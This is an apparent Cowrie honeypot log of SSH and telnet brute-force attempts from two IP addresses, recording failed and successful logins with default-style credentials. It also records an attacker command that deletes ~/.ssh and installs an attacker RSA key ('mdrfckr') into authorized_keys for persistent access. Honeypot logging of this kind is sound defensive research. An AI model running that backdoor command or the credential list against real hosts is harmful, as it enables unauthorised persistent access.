{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:06:12.702122Z","src_ip":"212.227.235.229","session":"c71e0b3dd6f0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T14:06:13.220090Z","src_ip":"212.227.235.229","session":"c71e0b3dd6f0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T14:06:13.220900Z","src_ip":"212.227.235.229","session":"c71e0b3dd6f0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T14:06:13.452085Z","src_ip":"212.227.235.229","session":"c71e0b3dd6f0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:06:13.453135Z","src_ip":"212.227.235.229","session":"c71e0b3dd6f0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58368,"dst_ip":"1.2.3.4","dst_port":22,"session":"197cca6c5f29","protocol":"ssh","message":"New connection: 212.227.235.229:58368 (1.2.3.4:22) [session: 197cca6c5f29]","sensor":"my-vps","timestamp":"2025-08-26T14:06:13.681999Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:06:13.682604Z","src_ip":"212.227.235.229","session":"197cca6c5f29"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:06:13.912729Z","src_ip":"212.227.235.229","session":"197cca6c5f29"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T14:06:14.884221Z","src_ip":"212.227.235.229","session":"197cca6c5f29"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:06:16.116632Z","src_ip":"212.227.235.229","session":"197cca6c5f29"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58382,"dst_ip":"1.2.3.4","dst_port":22,"session":"48cf63da9b1d","protocol":"ssh","message":"New connection: 212.227.235.229:58382 (1.2.3.4:22) [session: 48cf63da9b1d]","sensor":"my-vps","timestamp":"2025-08-26T14:06:16.358356Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:06:16.359165Z","src_ip":"212.227.235.229","session":"48cf63da9b1d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:06:16.599416Z","src_ip":"212.227.235.229","session":"48cf63da9b1d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:06:17.608043Z","src_ip":"212.227.235.229","session":"48cf63da9b1d"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:06:17.847059Z","src_ip":"212.227.235.229","session":"c71e0b3dd6f0"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:06:17.850255Z","src_ip":"212.227.235.229","session":"48cf63da9b1d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52334,"dst_ip":"1.2.3.4","dst_port":22,"session":"e32681326733","protocol":"ssh","message":"New connection: 212.227.125.160:52334 (1.2.3.4:22) [session: e32681326733]","sensor":"my-vps","timestamp":"2025-08-26T14:06:19.928970Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T14:06:19.932185Z","src_ip":"212.227.125.160","session":"e32681326733"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T14:06:20.177225Z","src_ip":"212.227.125.160","session":"e32681326733"}
{"eventid":"cowrie.login.failed","username":"admin","password":"default","message":"login attempt [admin/default] failed","sensor":"my-vps","timestamp":"2025-08-26T14:06:21.207952Z","src_ip":"212.227.125.160","session":"e32681326733"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:06:22.476919Z","src_ip":"212.227.125.160","session":"e32681326733"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54209,"dst_ip":"1.2.3.4","dst_port":23,"session":"82aaa0f3c8e7","protocol":"telnet","message":"New connection: 212.227.235.229:54209 (1.2.3.4:23) [session: 82aaa0f3c8e7]","sensor":"my-vps","timestamp":"2025-08-26T14:06:38.095209Z"}
{"eventid":"cowrie.session.closed","duration":4.915194988250732,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:06:43.010335Z","src_ip":"212.227.235.229","session":"82aaa0f3c8e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49250,"dst_ip":"1.2.3.4","dst_port":22,"session":"621aefc8707e","protocol":"ssh","message":"New connection: 212.227.125.160:49250 (1.2.3.4:22) [session: 621aefc8707e]","sensor":"my-vps","timestamp":"2025-08-26T14:06:51.656394Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T14:06:51.657696Z","src_ip":"212.227.125.160","session":"621aefc8707e"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T14:06:51.899239Z","src_ip":"212.227.125.160","session":"621aefc8707e"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:07:04.157815Z","src_ip":"212.227.235.229","session":"b44f08302493"}
{"eventid":"cowrie.login.failed","username":"operator","password":"operator","message":"login attempt [operator/operator] failed","sensor":"my-vps","timestamp":"2025-08-26T14:07:04.484473Z","src_ip":"212.227.125.160","session":"621aefc8707e"}
{"eventid":"cowrie.session.closed","duration":"16.4","message":"Connection lost after 16.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:07:08.105481Z","src_ip":"212.227.125.160","session":"621aefc8707e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51918,"dst_ip":"1.2.3.4","dst_port":22,"session":"57462e706731","protocol":"ssh","message":"New connection: 212.227.235.229:51918 (1.2.3.4:22) [session: 57462e706731]","sensor":"my-vps","timestamp":"2025-08-26T14:07:42.589552Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:07:42.590453Z","src_ip":"212.227.235.229","session":"57462e706731"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:07:42.830917Z","src_ip":"212.227.235.229","session":"57462e706731"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy@2024","message":"login attempt [deploy/deploy@2024] failed","sensor":"my-vps","timestamp":"2025-08-26T14:07:44.619019Z","src_ip":"212.227.235.229","session":"57462e706731"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:07:45.863244Z","src_ip":"212.227.235.229","session":"57462e706731"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46722,"dst_ip":"1.2.3.4","dst_port":22,"session":"467b85d0fc6c","protocol":"ssh","message":"New connection: 212.227.125.160:46722 (1.2.3.4:22) [session: 467b85d0fc6c]","sensor":"my-vps","timestamp":"2025-08-26T14:08:45.512950Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T14:08:46.155408Z","src_ip":"212.227.125.160","session":"467b85d0fc6c"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T14:08:47.551670Z","src_ip":"212.227.125.160","session":"467b85d0fc6c"}
{"eventid":"cowrie.login.failed","username":"support","password":"admin","message":"login attempt [support/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T14:08:52.161595Z","src_ip":"212.227.125.160","session":"467b85d0fc6c"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:08:53.702260Z","src_ip":"212.227.125.160","session":"467b85d0fc6c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":14402,"dst_ip":"1.2.3.4","dst_port":22,"session":"55b172885f30","protocol":"ssh","message":"New connection: 212.227.235.229:14402 (1.2.3.4:22) [session: 55b172885f30]","sensor":"my-vps","timestamp":"2025-08-26T14:08:56.873419Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T14:08:56.874320Z","src_ip":"212.227.235.229","session":"55b172885f30"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"